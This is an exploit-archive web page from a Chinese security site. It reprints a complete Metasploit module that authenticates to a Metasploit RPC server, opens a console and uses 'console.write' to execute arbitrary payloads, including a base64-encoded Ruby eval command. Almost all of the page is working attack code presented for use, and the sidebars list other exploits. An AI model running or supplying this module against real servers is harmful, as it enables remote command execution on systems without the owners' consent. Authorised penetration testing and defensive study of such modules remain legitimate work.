首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Metasploit RPC Console Command Execution
来源:metasploit.com 作者:Coles 发布时间:2017-07-25  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/rpc/v10/client'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Metasploit RPC Console Command Execution',
      'Description'     => %q{
        This module connects to a specified Metasploit RPC server and
        uses the 'console.write' procedure to execute operating
        system commands. Valid credentials are required to access the
        RPC interface.

        This module has been tested successfully on Metasploit 4.15
        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
        4.14 on Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
      'References'     =>
        [
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
        ],
      'Platform'       => %w{ ruby unix win },
      'Targets'        => [
          [ 'Ruby',        { 'Arch'     => ARCH_RUBY,
                             'Platform' => 'ruby',
                             'Payload'  => { 'BadChars' => "\x00" } } ],
          [ 'Windows CMD', { 'Arch'     => ARCH_CMD,
                             'Platform' => 'win',
                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ],
          [ 'Unix CMD',    { 'Arch'     => ARCH_CMD,
                             'Platform' => 'unix',
                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ]
        ],
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
      'Privileged'     => false,
      'DisclosureDate' => 'May 22 2011',
      'DefaultTarget'  => 0))
    register_options [ Opt::RPORT(55552),
                       OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
                       OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
                       OptBool.new('SSL', [ true, 'Use SSL', true]) ]
  end

  def execute_command(cmd, opts = {})
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

    if res.nil?
      fail_with Failure::Unknown, 'Connection failed'
    end

    unless res['wrote'].to_s =~ /\A\d+\z/
      print_error "Could not write to console #{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Wrote #{res['wrote']} bytes to console"
  end

  def exploit
    begin
      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
    rescue Rex::ConnectionRefused => e
      fail_with Failure::Unreachable, 'Connection refused'
    rescue => e
      fail_with Failure::Unknown, "Connection failed: #{e}"
    end

    res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']

    if @rpc.token.nil?
      fail_with Failure::NoAccess, 'Authentication failed'
    end

    print_good 'Authenticated successfully'
    vprint_status "Received temporary token: #{@rpc.token}"

    version = @rpc.call 'core.version'

    if res.nil?
      fail_with Failure::Unknown, 'Connection failed'
    end

    print_status "Metasploit #{version['version']}"
    print_status "Ruby #{version['ruby']}"
    print_status "API version #{version['api']}"

    vprint_status 'Creating new console...'
    res = @rpc.call 'console.create'

    if res.nil?
      fail_with Failure::Unknown, 'Connection failed'
    end

    unless res['id'].to_s =~ /\A\d+\z/
      print_error 'Could not create console:'
      print_line res.to_s
      return
    end

    @console_id = res['id']
    print_good "Created console ##{@console_id}"

    print_status 'Sending payload...'

    case target['Platform']
    when 'ruby'
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
    when 'win'
      cmd = payload.encoded
    when 'unix'
      cmd = payload.encoded
    else
      fail_with Failure::NoTarget, 'Invalid target'
    end

    execute_command cmd
  end

  def cleanup
    return if @console_id.nil?

    vprint_status 'Removing console...'
    res = @rpc.call 'console.destroy', @console_id

    if res.nil?
      print_error 'Connection failed'
      return
    end

    unless res['result'].eql? 'success'
      print_warning "Could not destroy console ##{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Destroyed console ##{@console_id}"
  ensure
    @rpc.close
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Netscaler SD-WAN 9.1.2.26.5612
·Easy Chat Server User Register
·Sonicwall < 8.1.0.2-14sv - 'si
·Sonicwall < 8.1.0.6-21sv - 'ge
·Microsoft Windows Kernel - 'IO
·Microsoft Internet Explorer 11
·Microsoft Internet Explorer 11
·Hashicorp vagrant-vmware-fusio
·Easy File Sharing Web Server 7
·Barracuda Load Balancer Firmwa
·Sophos Web Appliance 4.3.0.2 -
·Windows Browser Example Exploi
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved